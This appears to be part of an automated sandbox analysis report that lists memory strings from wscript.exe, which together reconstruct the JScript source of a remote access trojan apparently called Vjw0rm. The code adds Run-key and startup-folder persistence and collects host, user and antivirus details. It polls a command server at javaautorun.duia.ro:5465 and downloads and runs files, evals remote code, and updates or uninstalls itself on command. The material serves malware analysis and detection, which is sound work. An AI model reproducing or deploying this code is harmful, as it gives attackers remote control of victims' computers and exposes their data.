              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: opentextfile@8
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: readall@
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: replace`'
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: false@^
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.exe //b "@"<
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regi@
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nothing!@
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %sfdr@&6
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %rgne%@
              Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sleep
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.shell]
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4scripting.filesystemobjectz
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #"shell.applicatione$
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ="microsoft.xmlhttp
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcull
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\vjw0rm
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^\software\microsoft\windows\currentversion\run\
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,hklm\software\classes\
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_sz
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \defaulticon\p
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winmgmts:h
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b"win32_logicaldisk
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *win32_operatingsystem
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: antivirusproductn
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9/21_
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscripti
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptfullname6;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptname
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regread2
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: split6
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regwrite5
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: false-
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: createtextfile
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: write&
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: close
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: opentextfile
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: readall
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: replace~
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "wscript.exe //b ""
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nothing!
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %sfdrf"
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %rgne%
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sleeps
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0expandenvironmentstrings%
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: postu
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >u@http://javaautorun.duia.ro:5465/
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: setrequestheadere
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user-agent:
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sendd1a
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: responsetexts
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fileexists
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windir
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v\microsoft.net\framework\v2.0.50727\vbc.exe
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: computernamep
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usernamen
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: activexobject#
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: getobject
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: instancesof
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: enumerator
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: atend/i
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: item.(<
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: caption
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: movenext
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rpwinmgmts:\\localhost\root\securitycenter3
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: displaynameq
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $volumeserialnumber
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: copyfile
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: namespace
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t:p_m
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :eval code// coded by v_b01 | sliemerez -> twitter : sliemerez
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var j = ["wscript.shell","scripting.filesystemobject","shell.application","microsoft.xmlhttp"];
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var g = ["hkcu","hklm","hkcu\\vjw0rm","\\software\\microsoft\\windows\\currentversion\\run\\","hklm\\software\\classes\\","reg_sz","\\defaulticon\\"];
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var y = ["winmgmts:","win32_logicaldisk","win32_operatingsystem",'antivirusproduct'];
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var sh = cr(0);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var fs = cr(1);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var spl = "|v|";
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var ch = "\\";
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var vn = "9/21" + "_" + ob(6);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var fu = wscript.scriptfullname;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var wn = wscript.scriptname;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var u;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: try {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u = sh.regread(g[2]);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: } catch(err) {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var sv = fu.split("\\");
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (":\\" + sv[1] == ":\\" + wn) {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u = "true";
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sh.regwrite(g[2],u,g[5]);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: } else {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u = "false";
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ns();
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var p = pt('vre','');
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p = p.split(spl);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "cl") {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.quit(1);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "sc") {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var s2 = ex("temp") + "\\" + p[2];
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var fi = fs.createtextfile(s2,true);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fi.write(p[1]);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fi.close();
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sh.run(s2);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "ex") {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eval(p[1]);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "rn") {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var ri = fs.opentextfile(fu,1);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var fr = ri.readall();
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ri.close();
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vn = vn.split("_");
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fr = fr.replace(vn[0],p[1]);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var wi = fs.opentextfile(fu,2,false);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wi.write(fr);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wi.close();
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sh.run("wscript.exe //b \"" + fu + "\"");
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "up") {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var ctf = fs.createtextfile(s2,true);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var gu = p[1];
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gu = gu.replace("|u|","|v|");
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctf.write(gu);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctf.close();
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sh.run("wscript.exe //b \"" + s2 + "\"",6);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "un") {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var s2 = p[1];
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var vdr = fu;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var regi = "nothing!";
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%rgne%",regi);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eval(s2);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (p[0] === "rf") {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.sleep(7000);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: } while (true) ;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function ex(s) {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return sh.expandenvironmentstrings("%" + s + "%");
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function pt(c,a) {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var x = cr(3);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x.open('post','http://javaautorun.duia.ro:5465/' + c, false);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x.setrequestheader("user-agent:",nf());
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x.send(a);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return x.responsetext;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function nf() {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var s,nt,i;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (fs.fileexists(ex("windir") + "\\microsoft.net\\framework\\v2.0.50727\\vbc.exe")) {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt ="yes";
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt = "no";
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s = vn + ch + ex("computername") + ch + ex("username") + ch + ob(2) + ch + ob(4) + ch + ch + nt + ch + u + ch;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return s;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function cr(n) {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return new activexobject(j[n]);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function ob(n) {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var s;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (n == 2) {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s = getobject(y[0]).instancesof(y[2]);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var en = new enumerator(s);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for (; !en.atend();en.movenext()) {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var it = en.item();
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return it.caption;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: break;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (n == 4) {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s = getobject(wmg).instancesof(y[3]);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var str = it.displayname;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (str !== '') {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wmg = wmg + "2";
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: en = new enumerator(s);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: it = en.item();
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return it.displayname;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if (n==6) {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s = getobject(y[0]).instancesof(y[1]);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return it.volumeserialnumber;
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function ns() {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: try {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var ap = cr(2);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fs.copyfile(fu, ap.namespace(7).self.path + "\\" + wn,true);
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: } catch(err) {
              Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \jdkn7
              Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\systep
              Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: kernelbao
              Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: wmapi.d
              Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: local\sm
              Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: wsh-timer
              Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f6dee
              Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f)edd
              Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aqd!
              Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7add"
              Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "crd(
              Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +ckd)
              Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0c@d*
              Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f`l+e
              Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fnle
              Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f_lve
              Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fcm*d
              Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f^myd
              Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \ovd$
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: root\cimv2
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1root\cimv2:
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: not_null
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: timestamp
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: it32not_nulltimestamp
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: string
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: antivirusproduct
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windows defender
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {d68ddc3a-831f-4fae-9e44-da132c1acf46}
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windowsdefender://
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %programfiles%\windows defender\msmpeng.exe
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: thu, 27 jun 2019 08:28:49 gmt
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: antivirusproductwindows defender{d68ddc3a-831f-4fae-9e44-da132c1acf46}windowsdefender://%programfiles%\windows defender\msmpeng.exethu, 27 jun 2019 08:28:49 gmt
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rpcrt4.dll+0xdde1d
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: countrycode
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringcountrycode
